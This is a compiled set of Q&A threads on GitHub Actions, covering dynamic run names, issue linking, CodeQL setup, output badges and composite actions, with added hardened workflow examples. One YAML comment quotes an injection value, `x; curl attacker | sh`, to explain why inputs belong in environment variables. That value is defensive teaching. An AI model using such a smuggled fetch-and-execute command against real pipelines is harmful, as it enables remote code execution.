Github actions dynamic workflow name - github-actions

I have a manually triggered job that builds and deploys an image based on the tag I specify. Is there a way to make the workflow name dynamic?
name: Build and push
on:
  workflow_dispatch:
    inputs:
      tag:
        description: 'Image Tag'
        required: true
jobs:
  ...
I would like to do something like
name: "Build and push ${{ github.event.inputs.tag }}"

As of Sep 26th 2022, this is now supported. Here's the announcement (which contains a link to the documentation): https://github.blog/changelog/2022-09-26-github-actions-dynamic-names-for-workflow-runs/
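As an added example (not part of the answer above; the registry name, job name and validation pattern are assumptions), here is the workflow from the question with the now-supported run-name, together with the handling a reviewer would want for the tag input before it reaches a shell or a docker command. For workflow_dispatch the person pressing the button already has write access, but the same input-handling habit matters as soon as the pattern is reused with values taken from event data such as PR titles or branch names.

```yaml
# Added example, not from the original answer. The image name and the
# validation pattern are assumptions; adjust them to your registry's rules.
name: Build and push
# run-name is evaluated per run and shown in the Actions list; the workflow
# name itself stays fixed. It may reference the github, inputs and vars contexts.
run-name: Build and push ${{ inputs.tag }}

on:
  workflow_dispatch:
    inputs:
      tag:
        description: 'Image Tag'
        required: true

jobs:
  build-and-push:
    runs-on: ubuntu-latest
    env:
      # Hand the input to scripts through the environment rather than writing
      # ${{ inputs.tag }} inside the run: text. An expression inside run: is
      # substituted into the script before the shell sees it, so a value such as
      # `x; curl attacker | sh` would execute; an environment variable stays data.
      IMAGE_TAG: ${{ inputs.tag }}
    steps:
      - uses: actions/checkout@v4

      - name: Validate tag
        run: |
          # OCI image tag grammar: [A-Za-z0-9_] followed by up to 127 of [A-Za-z0-9_.-]
          if ! printf '%s\n' "$IMAGE_TAG" | grep -Eq '^[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}$'; then
            echo "::error::refusing to build: '$IMAGE_TAG' is not a valid image tag"
            exit 1
          fi

      - name: Build image
        # registry.example.com/app is an assumed image name
        run: docker build -t "registry.example.com/app:${IMAGE_TAG}" .
```

The run name appears in the Actions list as "Build and push v1.2.3"; the tag itself never enters the script text, and a value that could not be a legitimate image tag stops the job before docker sees it.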

Workflow names are not dynamic, but fixed.
To get at the actual data of a workflow run, you'll have to choose the specific run from the Actions > All Workflows > [name-of-your-workflow] list.
Alternatively, you can think about other ways to propagate the outcomes of your builds.
Our team, for example, propagates build outcomes to a team chat channel (in our case Microsoft Teams, using the action notify-microsoft-teams). If you search the marketplace you'll find plenty of actions for this.
Another alternative could be to generate custom badges, which you could then make visible to your team. A nice action for this is bring-your-own-badge.
Last but not least, you can propagate your workflow run data using emails (again, there are actions which do this for you).

Related

Github-Actions: link pull request to issue

I'm quite a rookie with GitHub Actions so this might be a stupid question: Is there a way to link pull requests with issues (in the UI linked PRs are shown under Development) in Github Actions using Github CLI or octokit/rest.js via actions/github-script?
Background: there is a workflow that creates pull requests. That works fine, only thing missing is the link between issues and corresponding pull requests. I would prefer not to use keywords nor other custom actions from the marketplace.
I've searched in the octokit/rest.js documentation https://octokit.github.io/rest.js/v19 under Issues and Pulls as well as in the GitHub cli documentation https://cli.github.com/manual/gh but couldn't find a solution.
I would like to have a solution either using GitHub Script https://github.com/marketplace/actions/github-script
or the command line.
You can use the Add an issue link Action for that.
This Action allows linking issues to Pull Requests. For example:
name: 'Issue Links'
on:
  pull_request:
    types: [opened]
jobs:
  issue-links:
    runs-on: ubuntu-latest
    permissions:
      pull-requests: write
    steps:
      - uses: tkt-actions/add-issue-links@v1.8.1
        with:
          repo-token: '${{ secrets.GITHUB_TOKEN }}' # required
          branch-prefix: 'issue-' # required
This workflow will trigger on Pull Request open and link related issues mentioned in the PR body.
Make sure to set the corresponding permission for the job:
permissions:
  pull-requests: write
For more about these permissions, see Permissions for the GITHUB_TOKEN.
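The same workflow with the hardening a reviewer would ask for before a third-party action receives a write-capable GITHUB_TOKEN (added example, not part of the answer; the SHA placeholder must be replaced with the real commit hash of the tag you audited):

```yaml
# Added example, not from the original answer.
name: 'Issue Links'

on:
  pull_request:
    types: [opened]

# Deny everything at the workflow level; each job re-grants only what it needs.
permissions: {}

jobs:
  issue-links:
    runs-on: ubuntu-latest
    # Pull requests from forks run with a read-only GITHUB_TOKEN, so the action
    # could not edit the PR body there anyway; skip them instead of failing.
    if: github.event.pull_request.head.repo.full_name == github.repository
    permissions:
      pull-requests: write
    steps:
      # Pin to the full commit SHA (placeholder below) rather than a mutable tag,
      # so a force-pushed tag or a compromised release cannot swap the code that
      # receives your token. Dependabot or Renovate can keep the SHA current while
      # the trailing comment keeps the version readable.
      - uses: 'tkt-actions/add-issue-links@<full-commit-sha-of-v1.8.1>' # v1.8.1
        with:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          branch-prefix: 'issue-'
```

With `permissions: {}` at the top, any job added later to this file starts with no token scopes at all, and the only write scope in the file is the one the linking step actually uses.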

Configuring CodeQL with Github actions using well known weaknesses

I am new to CodeQL and therefore my apologies if my question is an obvious one, however, I've been unable to understand a few simple concepts.
Firstly, I can easily configure a public repo with a github action using a yml file configured as follows:
on:
  push:
    branches: [ master ]
  pull_request:
    # The branches below must be a subset of the branches above
    branches: [ master ]

jobs:
  analyze:
    name: Analyze
    runs-on: ubuntu-latest
    permissions:
      actions: read
      contents: read
      security-events: write

    strategy:
      fail-fast: false
      matrix:
        language: [ 'java' ]
        # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
        # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    # Initializes the CodeQL tools for scanning.
    - name: Initialize CodeQL
      uses: github/codeql-action/init@v2
      with:
        queries: +security-extended
        languages: ${{ matrix.language }}
        # If you wish to specify custom queries, you can do so here or in a config file.
        # By default, queries listed here will override any specified in a config file.
        # Prefix the list here with "+" to use these queries and those in the config file.

        # Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
        # queries: security-extended,security-and-quality

    # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
    # If this step fails, then you should remove it and run the build manually (see below)
    - name: Autobuild
      uses: github/codeql-action/autobuild@v2

    # ℹ️ Command-line programs to run using the OS shell.
    # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun

    #   If the Autobuild fails above, remove it and uncomment the following three lines.
    #   modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance.

    # - run: |
    #   echo "Run, Build Application using script"
    #   ./location_of_script_within_repo/buildscript.sh

    - name: Perform CodeQL Analysis
      uses: github/codeql-action/analyze@v2
As indicated in the yaml file, I'm using Java as the language. What I'm trying to then do is trigger a failure / alert with a simple code such as this in Java.
public class Main {
    public static void main(String[] args) {
        // Example code for https://cwe.mitre.org/data/definitions/476.html
        String cmd = System.getProperty("cmd");
        cmd = cmd.trim();
    }
}
This simple code is an example from Common Weakness Enumeration (CWE) 416 where I'm trying to dereference a variable that hasn't been defined.
If I go to Security -> Code scanning alerts it will show that the scanning was performed but no alerts were found.
Basically, I'm wondering if I need to initialize the CodeQL with a specific CWE under the Initialize CodeQL step in the yaml file.
CodeQL only has a specific set of queries, which do not cover all possible CWEs. This list shows the currently covered CWEs for Java.
As far as I know there exists no query at the moment which detects the specific issue you are showing in your question (there are however queries which detect dereferencing null). The reason for this is most likely that it would be difficult to prevent false positives. For example if your application is started with -Dcmd, then the system property would not be null. Similarly there could be a call to System.setProperty in a different part of the application which sets the system property to a non-null value.
Besides that you have configured queries: +security-extended but the type of the query you are looking for (assuming it existed) would most likely be in the query suite security-and-quality because it is not directly security related.
You could also try to write your own queries and then include them in the code scanning workflow. Some concepts of CodeQL might feel a bit unfamiliar at first, but they provide great examples and tutorials for getting started. However, you should probably first check if the provided queries already suffice for your use case.
Since May 2022:
Using CodeQL query packs (and their associated CWE coverage, with query specifiers) is still beta, but not going anywhere
its setup has been simplified:
Code scanning can be set up more easily without committing a workflow file to the repository (Jan. 2023)
Code scanning's new default setup feature automatically finds and sets up the best CodeQL configuration for your repository.
This will detect the languages in the repository and enable CodeQL analysis for every pull request and every push to the default branch and any protected branches.
Default setup currently supports analysis of JavaScript (including TypeScript), Python, and Ruby code.
More languages will be supported soon, and all other languages supported by CodeQL continue to work using a GitHub Actions workflow file.
The new default setup feature is available for CodeQL on repositories that use GitHub Actions.
You can use default setup on your repository's "Settings" tab under "Code security and analysis" (accessible by repository admins and security managers).
The options to set up code scanning using an Actions workflow file or through API upload from 3rd party CI/CD systems remain supported and are unchanged.
This more advanced setup method can be useful if you need to alter the default configuration, for example to include custom query packs.
Default setup configurations can also be converted to advanced setups if your analysis requirements change.
Default setup is currently available at the repository level.
We are actively working on future features at the organization level so you can easily set up code scanning at scale across large numbers of repositories.
This has shipped to GitHub.com and will be available in GitHub Enterprise Server 3.9.
To learn more, read the documentation on setting up code scanning for a repository.
In your case, you would still need an Actions workflow file, to specify a query pack.
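An added example of the advanced setup both answers point to (this is not code from the page): the init step hands CodeQL a config file, so the query selection lives in the repository instead of the workflow's queries: input, which would otherwise replace the config file's list unless prefixed with "+". The suite is switched to security-and-quality, which is where the first answer expects nullness-style checks to live, and an in-repo query directory is added as a placeholder for your own queries. The config path, the query directory and the ignored paths are assumptions; the action is pinned to v3, the current major at the time of writing, whereas the template in the question uses v2.

```yaml
# .github/workflows/codeql.yml (added example; trimmed version of the template
# in the question, with the init step reading a config file)
name: CodeQL

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:
  analyze:
    runs-on: ubuntu-latest
    permissions:
      actions: read
      contents: read
      security-events: write   # needed to upload SARIF results
    strategy:
      fail-fast: false
      matrix:
        language: [ 'java' ]
    steps:
      - uses: actions/checkout@v4
      - uses: github/codeql-action/init@v3
        with:
          languages: ${{ matrix.language }}
          # No queries: input here. Anything listed in that input replaces the
          # config file's list unless it is written with a leading "+".
          config-file: ./.github/codeql/codeql-config.yml
      - uses: github/codeql-action/autobuild@v3
      - uses: github/codeql-action/analyze@v3
---
# .github/codeql/codeql-config.yml (added example)
name: "Java: security-and-quality plus in-repo queries"

# Keep the default query set; the entries below are added to it, not swapped in.
disable-default-queries: false

queries:
  # Bundled suite that includes the quality and nullness checks, not only the
  # security-extended subset the question's workflow enabled.
  - uses: security-and-quality
  # Assumed path: a directory holding your own .ql files and a qlpack.yml. A
  # custom query for the pattern in the question would go here.
  - name: Project-specific queries
    uses: ./codeql/java

# Findings in test fixtures and vendored code are noise; leave them out.
paths-ignore:
  - src/test/**
  - third_party/**
```

Keeping the selection in the config file means a reviewer can see, in one place and in the pull request that changes it, exactly which suites and custom queries the scan runs with.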

Name of Github action run in list

I have a Github action that sets a name and is run on pull requests:
name: Code Quality
on:
  workflow_dispatch:
  pull_request:
    branches: [ main, develop ]
When I trigger the run manually (because workflow_dispatch is also set), the run will get the title “Code Quality” in the list of runs.
But when the action is run on a pull request, the run name in the list is set to the name of the PR. That may or may not be a good title, very much depending on the PR’s author. Is there a way to influence the title of the action in the list?
Since Sept. 2022, there might be a way to set the title of the run itself:
GitHub Actions: Dynamic names for workflow runs (Sep. 2022)
GitHub Actions customers can now dynamically name their workflow runs.
The new run-name feature will accept expressions and be displayed on the list of workflow runs.
For more information on how to use run-name, visit the documentation.
For questions, visit the GitHub Actions community.
To see what's next for Actions, visit our public roadmap.
You now have:
The name for workflow runs generated from the workflow.
GitHub displays the workflow run name in the list of workflow runs on your repository's "Actions" tab.
If you omit run-name, the run name is set to event-specific information for the workflow run.
For example, for a workflow triggered by a push or pull_request event, it is set as the commit message.
This value can include expressions and can reference the github and inputs contexts.
Example
run-name: Deploy to ${{ inputs.deploy_target }} by @${{ github.actor }}
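Added example (not from the answer): a run-name for the Code Quality workflow in the question that no longer depends on what the PR author typed as a title. It branches on github.event_name and builds the label with format(), so manual and pull-request runs each get a predictable name; the payload fields used are those of the pull_request event, and the lint job is a placeholder.

```yaml
# Added example, not from the original answer.
name: Code Quality
# The whole value is double-quoted so that the '#' inside the expression is not
# taken as a YAML comment; strings inside the expression use single quotes.
# The `cond && a || b` form is the usual ternary idiom in Actions expressions.
run-name: "${{ github.event_name == 'pull_request' && format('Code Quality: PR #{0} ({1} -> {2}) by @{3}', github.event.pull_request.number, github.head_ref, github.base_ref, github.actor) || format('Code Quality: {0} on {1}', github.event_name, github.ref_name) }}"

on:
  workflow_dispatch:
  pull_request:
    branches: [ main, develop ]

jobs:
  lint:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: echo "linting ${GITHUB_SHA}"   # placeholder for the real checks
```

A PR run is then listed as "Code Quality: PR #42 (feature -> main) by @someone" and a manual run as "Code Quality: workflow_dispatch on main", whatever the PR title says.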
It does not seem like there is a way to set the title of the run itself (reference).
Scheduled and manual runs will get the title of the workflow, and runs triggered by commit / PR will get the commit message or PR title.
However, notice that the commit / PR title is displayed in addition to the name of the workflow, which appears in two places:

How to access GitHub action output in a badge

I have a GitHub action workflow that outputs a number and I want to display that in a badge.
Using https://github.com/username/reponame/actions/workflows/myaction.yml/badge.svg I get a red or green failing/success badge but I want to display the number of failures instead, which the workflow outputs into the "errors" output variable.
How can I access that variable in a badge?
There are a few options in the GitHub Actions marketplace.
Bring Your Own Badge - https://github.com/marketplace/actions/bring-your-own-badge
BYOB is a GitHub Action to create badges dynamically based off of GitHub Actions' results, allowing for extremely versatile and easily-maintainable badges.
If you want to use https://shields.io/, consider Dynamic Badges - https://github.com/marketplace/actions/dynamic-badges
This action allows you to create badges for your README.md with shields.io which may change with every commit. To do this, this action does not need to push anything to your repository!
In a subsequent job (step) in the same workflow you could.
I think you want to use your own badge using e.g. https://img.shields.io.
I imagine you will update e.g. the README file every time the actions are finished; the updating step will be part of the workflow. The transfer of output could be done like here: Using output from a previous job in a new one in a GitHub Action.
You will append e.g. the README with a proper svg [![](https://img.shields.io/badge/TEXT-NUMBER-COLOR?style=flat)](some url).
I created an action to generate a badge from a workflow:
Build-A-Badge - https://github.com/marketplace/actions/build-a-badge
As other users have pointed out, I didn't want any external dependencies or to create new branches on the main repo. So the workaround I used is to store the badge data in the Wiki, which is a separate repository.
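Added example, not from any of the answers: the job-output plumbing the second answer refers to, feeding a shields.io endpoint badge through the Dynamic Badges action the first answer names. The test script, the gist id and the secret name are assumptions; the action's input names are the ones in its README at the time of writing, so check them against the version you pin.

```yaml
# Added example, not from the original answers. Assumed: a test script that
# prints one "FAIL ..." line per failure, a gist you own, and a repository
# secret GIST_TOKEN holding a token limited to the gist scope.
name: Tests with error badge

on:
  push:
    branches: [ main ]

permissions:
  contents: read

jobs:
  test:
    runs-on: ubuntu-latest
    outputs:
      # A job output is the only way a later job (and so the badge) can read the value.
      errors: ${{ steps.count.outputs.errors }}
    steps:
      - uses: actions/checkout@v4
      - id: count
        run: |
          # grep -c prints 0 and exits 1 when nothing matches; keep the number, drop the status.
          errors=$(./run-tests.sh 2>&1 | tee test.log | grep -c '^FAIL' || true)
          echo "errors=${errors}" >> "$GITHUB_OUTPUT"
      - name: Fail the job if anything failed (after the output has been recorded)
        env:
          ERRORS: ${{ steps.count.outputs.errors }}
        run: test "$ERRORS" -eq 0

  badge:
    needs: test
    # Run even when the test job failed: that is exactly when the badge must change.
    if: always()
    runs-on: ubuntu-latest
    steps:
      - uses: schneegans/dynamic-badges-action@v1.7.0
        with:
          auth: ${{ secrets.GIST_TOKEN }}
          gistID: 0123456789abcdef0123456789abcdef   # assumed; the id of your gist
          filename: errors.json
          label: test failures
          message: ${{ needs.test.outputs.errors }}
          color: ${{ needs.test.outputs.errors == '0' && 'brightgreen' || 'red' }}
```

The README then embeds `https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/<user>/<gistID>/raw/errors.json`. Nothing is committed to the repository, the workflow keeps `contents: read`, and the only credential involved is a gist-scoped token that cannot touch code.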

In GitHub Actions is it possible to pass steps to a sub-action?

Is there any way that a step in a workflow job can specify sub-steps to pass to a custom action?
steps:
  - uses: ...
    with:
      steps:
        - ...
        - ...
        - ...
For example, a uses: actions/cache@v2 will attempt to download a snapshot immediately (in the current step), and also inserts a post step to upload a fresh snapshot after all other steps in the parent job. This works well for build processes that (through multiple stages) intelligently recognise which objects need to be recreated and which do not. But it is not suited for workflows that need to set up a clean environment (or generate test data) that may then be manipulated by the tests. I'd like to make a different cache action, that is explicitly passed instructions for how to regenerate the cache from scratch, and which uploads the state before returning to the following step of the parent action.
Is there any way this could be achieved? (Composite actions? Advanced yaml syntax? Template expressions? Low-level actions toolkits/features? Implementing an interpreter to re-parse the input parameter?)
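The page carries no answer to this question; what follows is an added example of one way to get the described behaviour from building blocks GitHub already ships, not a description of how actions/cache itself works. It relies on the actions/cache/restore and actions/cache/save sub-actions, which split the single cache action into two explicit steps, so a composite action can restore, run a caller-supplied regeneration snippet on a miss, and save, all before the parent job's next step. The action name, input names and paths are assumptions.

```yaml
# .github/actions/regen-cache/action.yml (added example; name and inputs assumed)
name: 'Regenerating cache'
description: 'Restore a cache; on a miss, rebuild it with a caller-supplied snippet and save it before returning'

inputs:
  path:
    description: 'Files or directories to cache, one per line'
    required: true
  key:
    description: 'Cache key; include a hash of whatever the regeneration depends on'
    required: true
  regenerate:
    description: 'Bash snippet that recreates the cached state from scratch'
    required: true

outputs:
  cache-hit:
    description: 'true when the state came from the cache rather than from regenerate'
    value: ${{ steps.restore.outputs.cache-hit }}

runs:
  using: composite
  steps:
    - id: restore
      uses: actions/cache/restore@v4
      with:
        path: ${{ inputs.path }}
        key: ${{ inputs.key }}

    # The snippet is substituted into the script text before bash runs it, so it
    # behaves like an inlined step. That is the intent here, and it is safe only
    # while callers pass a literal written in their workflow file; never build
    # this input from event data (PR titles, branch names, issue bodies).
    - if: steps.restore.outputs.cache-hit != 'true'
      shell: bash
      run: ${{ inputs.regenerate }}

    - if: steps.restore.outputs.cache-hit != 'true'
      uses: actions/cache/save@v4
      with:
        path: ${{ inputs.path }}
        key: ${{ inputs.key }}
---
# Caller workflow (added example). Later steps may mutate the directory freely:
# nothing is uploaded after the composite action returns.
name: Tests
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: ./.github/actions/regen-cache
        with:
          path: testdata
          key: testdata-${{ hashFiles('scripts/gen-testdata.sh') }}
          regenerate: |
            ./scripts/gen-testdata.sh testdata
      - run: ./scripts/run-tests.sh testdata   # may modify testdata; not saved
```

The snapshot is saved exactly once, immediately after regeneration and before the tests touch it, which is the ordering the question asks for; the trade-off is that the regeneration instructions are plain text expanded into a script, so the caller's workflow file is the trust boundary for that input.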